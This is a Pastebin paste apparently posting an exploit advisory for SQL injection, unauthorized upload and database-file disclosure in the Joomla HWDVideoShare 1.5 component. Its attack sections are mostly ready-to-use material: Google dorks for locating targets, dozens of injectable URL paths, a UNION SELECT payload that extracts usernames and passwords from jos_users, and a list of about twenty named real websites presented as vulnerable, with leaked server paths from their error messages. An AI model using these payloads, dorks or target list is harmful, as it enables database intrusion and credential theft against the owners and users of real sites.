API tools faq
paste
KingSkrupellos

Joomla HWDVideoShare Components 1.5 Multiple Vuln

KingSkrupellos
Jan 31st, 2019
104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.45 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla HWDVideoShare Components 1.5 SQL Injection / Database Disclosure / Incorrect Authorization
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 30/01/2019
  7. # Vendor Homepage : joomla.org ~ hwdmediashare.co.uk
  8. # Software Download Link : hwdmediashare.co.uk/hwdvideoshare
  9. # Software Source Files and Codes :
  10. github.com/rkern21/videoeditor/tree/master/administrator/components/com_hwdvideoshare
  11. # Software Version : 1.0 and 1.5
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : High
  15. # Google Dorks : inurl:''/index.php?option=com_hwdvideoshare''
  16. intext:Joomla Video Component by hwdVideoShare
  17. intext:Designed & Developed by Quantum Pro 4 Information Technology
  18. intext:desenvolvido por MANUEL PEDREIRO
  19. intext:Icones por "Marcos Antonio"
  20. intext:Powered by hwdMediaShare
  21. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  22. Special Elements used in an SQL Command ('SQL Injection') ]
  23. CWE-200 [ Information Exposure ]
  24. CWE-863 [ Incorrect Authorization ]
  25. # Similar but Old CVE 02/22/2008 : cvedetails.com/cve/CVE-2008-0916/ - CVE-2008-0916
  26. Note : Keep in Mind. This Exploit/Vulnerability is in more details with another version.
  27. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  28. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  29. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  30. # Reference Link : cxsecurity.com/issue/WLB-2019010286
  31.  
  32. ####################################################################
  33.  
  34. # Description about Software :
  35. ***************************
  36.  
  37. * hwdVideoShare was a powerful Joomla 1.5 video gallery that allowed Joomla webmasters to
  38.  
  39. display video media in an organised and manageable layout on the internet.
  40.  
  41. The gallery could handle the uploading, server-side processing and playback of large video
  42.  
  43. media in all popular formats. It could also import videos from popular
  44.  
  45. video websites such as Youtube and Vimeo.
  46.  
  47. ####################################################################
  48.  
  49. # Impact :
  50. ***********
  51.  
  52. * SQL injection vulnerability in the HWDVideoShare (com_hwdvideoshare)
  53.  
  54. 1.5 component for Joomla! allows remote attackers to execute arbitrary
  55.  
  56. SQL commands via the " cat_id Itemid= pattern= hwdcorder= video_id= "
  57.  
  58. with different parameters action to index.php and it has SQL Database Errors
  59.  
  60. under the administrator components.
  61.  
  62. * An attacker might be able inject and/or alter existing SQL statements which would influence the database exchange.
  63.  
  64. * It fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  65.  
  66. * Exploiting this issue could allow an attacker to compromise the application, read,
  67.  
  68. access or modify data, or exploit latent vulnerabilities in the underlying database.
  69.  
  70. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  71.  
  72. * This software hwdVideoShare performs an authorization check when an actor attempts to access
  73.  
  74. a resource or perform an action, but it does not correctly perform the check.
  75.  
  76. This allows attackers to bypass intended access restrictions.
  77.  
  78. ####################################################################
  79.  
  80. # SQL Injection Exploit :
  81. **********************
  82.  
  83. /administrator/components/com_hwdvideoshare/libraries/warp/infin-lib.php?id=[SQL Injection]
  84.  
  85. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.nusoap_base.php?id=[SQL Injection]
  86.  
  87. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_fault.php?id=[SQL Injection]
  88.  
  89. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_parser.php?id=[SQL Injection]
  90.  
  91. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_server.php?id=[SQL Injection]
  92.  
  93. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_transport_http.php?id=[SQL Injection]
  94.  
  95. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_val.php?id=[SQL Injection]
  96.  
  97. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soapclient.php?id=[SQL Injection]
  98.  
  99. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.wsdl.php?id=[SQL Injection]
  100.  
  101. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.wsdlcache.php?id=[SQL Injection]
  102.  
  103. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.xmlschema.php?id=[SQL Injection]
  104.  
  105. /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/nusoap.php?id=[SQL Injection]
  106.  
  107. /administrator/components/com_hwdvideoshare/libraries/GIFEncoder.class.php?id=[SQL Injection]
  108.  
  109. /administrator/components/com_hwdvideoshare/libraries/csv_iterator.class.php?id=[SQL Injection]
  110.  
  111. /administrator/components/com_hwdvideoshare/libraries/file_management.class.php?id=[SQL Injection]
  112.  
  113. /administrator/components/com_hwdvideoshare/libraries/maintenance_archivelogs.class.php?id=[SQL Injection]
  114.  
  115. /administrator/components/com_hwdvideoshare/libraries/maintenance_fixerrors.class.php?id=[SQL Injection]
  116.  
  117. /administrator/components/com_hwdvideoshare/libraries/maintenance_recount.class.php?id=[SQL Injection]
  118.  
  119. /administrator/components/com_hwdvideoshare/libraries/mysql_backup.class.php?id=[SQL Injection]
  120.  
  121. /administrator/components/com_hwdvideoshare/libraries/streamers.class.php?id=[SQL Injection]
  122.  
  123. /administrator/components/com_hwdvideoshare/libraries/thumbnail.inc.php?id=[SQL Injection]
  124.  
  125. /administrator/components/com_hwdvideoshare/libraries/id3/getid3.php?id=[SQL Injection]
  126.  
  127. /administrator/components/com_hwdvideoshare/libraries/id3/getid3.lib.php?id=[SQL Injection]
  128.  
  129. /administrator/components/com_hwdvideoshare/libraries/smarty/Config_File.class.php?id=[SQL Injection]
  130.  
  131. /administrator/components/com_hwdvideoshare/libraries/smarty/Smarty.class.php?id=[SQL Injection]
  132.  
  133. /administrator/components/com_hwdvideoshare/libraries/smarty/Smarty_Compiler.class.php?id=[SQL Injection]
  134.  
  135. /administrator/components/com_hwdvideoshare/libraries/thumbnail/thumbnail.inc.php?id=[SQL Injection]
  136.  
  137. /index.php?option=com_hwdvideoshare&Itemid=[SQL Injection]
  138.  
  139. /index.php?option=com_hwdvideoshare&task=frontpage&Itemid=[SQL Injection]
  140.  
  141. /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=[SQL Injection]
  142.  
  143. /index.php?option=com_hwdvideoshare&task=search&Itemid=[SQL Injection]
  144.  
  145. /index.php?option=com_hwdvideoshare&task=search&Itemid=[ID-NUMBER]&pattern=[SQL Injection]
  146.  
  147. /index.php?option=com_hwdvideoshare&task=categories&Itemid=[SQL Injection]
  148.  
  149. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=categories&hwdcorder=[SQL Injection]
  150.  
  151. /index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=[ID-NUMBER]&video_id=[SQL Injection]
  152.  
  153. /index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=[ID-NUMBER]&cat_id=[SQL Injection]
  154.  
  155. /index.php?option=com_hwdvideoshare&task=displayresults&Itemid=
  156. [ID-NUMBER]&rpp=[ID-NUMBER]&sort=[ID-NUMBER]&ep=&ex=&category_id=
  157. [ID-NUMBER]&pattern=[SQL Injection]
  158.  
  159. # Exploit Payload PoC :
  160. *********************
  161.  
  162. /[ID-NUMBER]&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*
  163.  
  164. ####################################################################
  165.  
  166. # Add Video File without Authorization / Incorrect Authorization Exploit :
  167. **********************************************************************
  168.  
  169. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=upload
  170.  
  171. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=upload&lang=en
  172.  
  173. # Directory File Path :
  174. *******************
  175.  
  176. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=categories
  177.  
  178. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=groups
  179.  
  180. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=frontpage
  181.  
  182. /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=viewvideo&video_id=[ID-NUMBER]?tmpl=component
  183.  
  184. # Note : If websites are not vulnerable it says :
  185.  
  186. You are not authorized to upload videos.
  187.  
  188. ####################################################################
  189.  
  190. # Database Disclosure Exploit :
  191. ***************************
  192.  
  193. /administrator/components/com_hwdvideoshare/install.mysql.nonutf8.sql
  194.  
  195. /administrator/components/com_hwdvideoshare/install.mysql.utf8.sql
  196.  
  197. ####################################################################
  198.  
  199. # Example Vulnerable Sites :
  200. *************************
  201.  
  202. [+] visionartepro.com/index.php?option=com_hwdvideoshare&task=search&Itemid=96%27
  203.  
  204. [+] visionartepro.com/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/nusoapmime.php?id=1%27
  205.  
  206. [+] thenationalgamingleague.com/index.php?option=com_hwdvideoshare&Itemid=243%27
  207.  
  208. [+] thenationalgamingleague.com/administrator/components/com_hwdvideoshare/install.mysql.utf8.sql
  209.  
  210. [+] kondicionitrening.com/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=67&video_id=44%27
  211.  
  212. [+] cypruscommunitymedia.org/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=66&cat_id=5%27
  213.  
  214. [+] canal44.tv/canal44-2-0-1/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=109&video_id=15%27
  215.  
  216. [+] super.besteciler.com/index.php?Itemid=78&option=com_hwdvideoshare&task=viewvideo&video_id=13%27
  217.  
  218. [+] sijpa.org/index.php?option=com_hwdvideoshare&Itemid=24%27
  219.  
  220. [+] mustang.is/~mustan13/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=41&video_id=166%27
  221.  
  222. [+] redrecicladores.net/2015/backup/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=89&video_id=15%27
  223.  
  224. [+] globalclimbing.net/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=78&video_id=132%27
  225.  
  226. [+] almuslimalmuaser.org/index.php?option=com_hwdvideoshare&task=categories&Itemid=129%27
  227.  
  228. [+] lineprosperity.ru/index.php/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=51&cat_id=30%27
  229.  
  230. [+] buenobr.com.br/blog/index.php?option=com_hwdvideoshare&Itemid=57&task=categories&hwdcorder=1%27
  231.  
  232. [+] tonyromano.info/index.php?option=com_hwdvideoshare&task=displayresults
  233. &Itemid=4&rpp=0&sort=0&ep=&ex=&category_id=0&pattern=1%27
  234.  
  235. [+] rallyrace.it/2009/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=93&video_id=7%27
  236.  
  237. [+] lnx.dehonianos.org/pjuvenilv/index.php?option=com_hwdvideoshare&Itemid=30%27
  238.  
  239. [+] qapsites.com.br/coophalis/index.php?option=com_hwdvideoshare&task=search&Itemid=54&pattern=1%27
  240.  
  241. [+] jovemguarda.com.br/50anos/index.php?option=com_hwdvideoshare&task=frontpage&Itemid=60%27
  242.  
  243. [+] dehonianos.org/pjuvenilv/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=30&video_id=3%27
  244.  
  245. ####################################################################
  246.  
  247. # SQL Database Error :
  248. *********************
  249.  
  250. Warning: Creating default object from empty value in
  251. /home/kondicio/public_html/administrator/components
  252. /com_hwdvideoshare/libraries/maintenance_recount.class.php on line 284
  253.  
  254. Strict Standards: Non-static method JLoader::import() should not be
  255. called statically in /home/redrec26/public_html/2015/backup/libraries
  256. /joomla/import.php on line 29
  257.  
  258. Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime()
  259. in /home/creaarte/public_html/visionartepro.com/includes/framework.php:21
  260. Stack trace: #0 /home/creaarte/public_html/visionartepro.com/index.php(22):
  261. require_once() #1 {main} thrown in /home/creaarte/public_html
  262. /visionartepro.com/includes/framework.php on line 21
  263.  
  264. ####################################################################
  265.  
  266. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  267.  
  268. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!